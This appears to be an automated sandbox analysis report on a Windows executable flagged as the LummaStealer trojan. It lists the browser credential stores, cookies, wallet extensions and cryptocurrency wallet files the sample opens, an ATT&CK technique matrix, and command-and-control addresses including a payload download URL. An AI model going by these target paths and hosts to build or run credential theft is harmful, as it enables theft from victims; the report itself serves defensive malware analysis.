              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\fkydjyhjadg.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1533725414.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1533589434.0000000000A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: fkydjyhjadg.exe PID: 7644, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: fkydjyhjadg.exe PID: 7644, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              21
              Virtualization/Sandbox Evasion
              1
              OS Credential Dumping
              221
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
              Obfuscated Files or Information
              LSASS Memory21
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol31
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
              Software Packing
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture14
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              fkydjyhjadg.exe47%ReversingLabsWin32.Trojan.LummaStealer
              fkydjyhjadg.exe100%AviraHEUR/AGEN.1314134
              fkydjyhjadg.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://147.45.47.81/0%Avira URL Cloudsafe
              https://atten-supporse.biz/apiwli8pw0%Avira URL Cloudsafe
              https://atten-supporse.biz/api3p6Aya0%Avira URL Cloudsafe
              https://atten-supporse.biz/api:S0%Avira URL Cloudsafe
              http://147.45.47.81:80/conhost.exe0%Avira URL Cloudsafe
              https://atten-supporse.biz/260%Avira URL Cloudsafe
              http://147.45.47.81/conhost.exe0%Avira URL Cloudsafe
              http://147.45.47.81/80%Avira URL Cloudsafe
              http://147.45.47.81/10%Avira URL Cloudsafe
              http://147.45.47.81/oded0%Avira URL Cloudsafe
              https://atten-supporse.biz/q0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              atten-supporse.biz
              172.67.165.166
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://atten-supporse.biz/apifalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://duckduckgo.com/chrome_newtabfkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://duckduckgo.com/ac/?q=fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://atten-supporse.biz/apiwli8pwfkydjyhjadg.exe, 00000000.00000003.1579126128.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566007178.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1557298842.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685146502.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2019407520.0000000003928000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.microsoftfkydjyhjadg.exe, 00000000.00000003.1566111992.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2018483183.00000000009F0000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685286401.00000000009EE000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://147.45.47.81/fkydjyhjadg.exe, 00000000.00000002.2018255121.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://atten-supporse.biz/api3p6Ayafkydjyhjadg.exe, 00000000.00000003.1579126128.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1566007178.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1557298842.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1685146502.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1530072898.0000000003928000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000002.2019407520.0000000003928000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.enigmaprotector.com/openUfkydjyhjadg.exe, 00000000.00000002.2017786925.0000000000124000.00000040.00000001.01000000.00000003.sdmpfalse
                            high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://crl.rootca1.amazontrust.com/rootca1.crl0fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://147.45.47.81:80/conhost.exefkydjyhjadg.exe, 00000000.00000003.1685321017.00000000009B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fkydjyhjadg.exe, 00000000.00000003.1444758788.00000000038D9000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444647768.00000000038DC000.00000004.00000800.00020000.00000000.sdmp, fkydjyhjadg.exe, 00000000.00000003.1444697967.00000000038D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://ocsp.rootca1.amazontrust.com0:fkydjyhjadg.exe, 00000000.00000003.1499098189.00000000039AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYifkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.fkydjyhjadg.exe, 00000000.00000003.1501350185.0000000003931000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
